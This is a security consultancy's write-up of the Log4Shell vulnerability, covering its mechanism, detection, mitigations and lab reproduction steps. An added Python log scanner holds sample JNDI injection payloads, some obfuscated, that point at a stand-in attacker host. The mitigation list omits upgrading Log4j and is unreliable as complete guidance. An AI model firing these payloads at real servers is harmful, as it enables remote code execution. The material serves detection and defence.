3WaySecure Consulting

03.30.2022
Vulnerability Analysis: Log4j (CVE-2021-44228)

Introduction:

On December 10, 2021, details of CVE-2021-44228, a remote code execution vulnerability in the Apache open-source logging project Log4j, were made public. The vulnerability was named Log4Shell, and it allows an attacker to execute arbitrary code on a target server. It is considered very serious for three reasons: it is simple to exploit, successful exploitation can give an attacker full access to the server, and, because Log4j is so widely used, it can affect millions of devices. Adobe, IBM, Broadcom and VMware are some of the vendors impacted by this vulnerability.

Log4j2 is an upgraded version of Log4j, the open-source logging component from Apache; the rewrite introduced a rich feature set. The component records log information about program input and output and is widely used in business system development. Log4j2 has a Lookup function that lets developers read configuration from the corresponding environment through various protocols. The vulnerability is triggered when the program writes user-entered data to a log: if the logged content contains the keyword "${", an attacker can use the content of the keyword as a variable and substitute an attack command for it.

Severity Score

In the National Vulnerability Database (NVD), this vulnerability has a score of 10.0, the highest possible score, meaning that it has the highest level of severity.

Detecting Log4j attacks

Log4j attacks can be detected at various stages of the attack.

1. IPS signatures can be updated to detect JNDI payloads.

2. SIEM systems can be used to perform log inspection.

3. Anti-malware solutions can be used to prevent ransomware from being downloaded and installed.
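As an added example (not part of the original post), a small Python scanner of the kind the SIEM log inspection in item 2 relies on: it URL-decodes each line, collapses the nested lookups that split the keyword across braces, and then flags lines carrying "${jndi:" while reporting any other "${" lookup reaching the logger. The log lines and the attacker.example host are constructed for this example.

```python
import re
from urllib.parse import unquote
# Constructed sample log lines (not from the original post): three JNDI
# lookups in different spellings, one non-JNDI lookup, one ordinary request.
SAMPLE_LOGS = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.7 - - "GET /solr/admin/cores?action=${${lower:j}ndi:rmi://attacker.example/b} HTTP/1.1" 404',
    '10.0.0.8 - - "GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi:ldap://attacker.example/c%7D HTTP/1.1" 200',
    'INFO  startup path=${sys:user.home}',
    '10.0.0.9 - - "GET /index.html HTTP/1.1" 200 "-" "Mozilla/5.0"',
]

# Innermost ${...} lookup: no nested "${" or "}" inside the braces.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

def _resolve(match: re.Match) -> str:
    """Emulate the lookups used to split the keyword across nested braces
    (lower:, upper:, and the default-value form ${name:-default}).
    Anything else is left in place."""
    body = match.group(1)
    if body.lower().startswith("lower:"):
        return body[6:].lower()
    if body.lower().startswith("upper:"):
        return body[6:].upper()
    if ":-" in body:
        return body.split(":-", 1)[1]
    return match.group(0)

def normalize(line: str, max_rounds: int = 10) -> str:
    """URL-decode, then collapse nested lookups from the inside out until
    nothing more resolves (bounded so hostile input cannot spin)."""
    text = unquote(line)
    for _ in range(max_rounds):
        new_text = INNER_LOOKUP.sub(_resolve, text)
        if new_text == text:
            break
        text = new_text
    return text

def scan_line(line: str) -> str:
    """'jndi' for a JNDI lookup, 'lookup' for any other ${...} that reached
    the logger (the "${" keyword described above), otherwise 'clean'."""
    text = normalize(line)
    if JNDI_LOOKUP.search(text):
        return "jndi"
    if "${" in text:
        return "lookup"
    return "clean"

if __name__ == "__main__":
    for line in SAMPLE_LOGS:
        print(f"{scan_line(line):6} {line}")
```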

How to identify if your organization needs to take action

1. If your organization runs Log4j as part of an application or service that is exposed to a network, that network can be used as a vector to launch the attack. The network can be internal or external, such as the internet.

2. If your organization does not run an application with Log4j directly, but Log4j is used for processing or backups, your systems are still vulnerable and could be attacked.

Solution

1. Set the configuration parameter log4j2.formatMsgNoLookups=true.

2. Add the JVM parameter -Dlog4j2.formatMsgNoLookups=true.

3. Set the system environment variable FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS to true.

4. Prohibit external connections to the server where log4j2 is located.

5. Upgrade the JDK to version 6u211 / 7u201 / 8u191 / 11.0.1 or above.

If you want to go a step further and reproduce the vulnerability:

First, download the vulnerable environment using Docker on Kali.

Open the IP address on port 8983 in a browser to view it.

Apply for a temporary DNSlog on the website.

After clicking "Refresh Record", the Java version appears in "DNS Query Record".
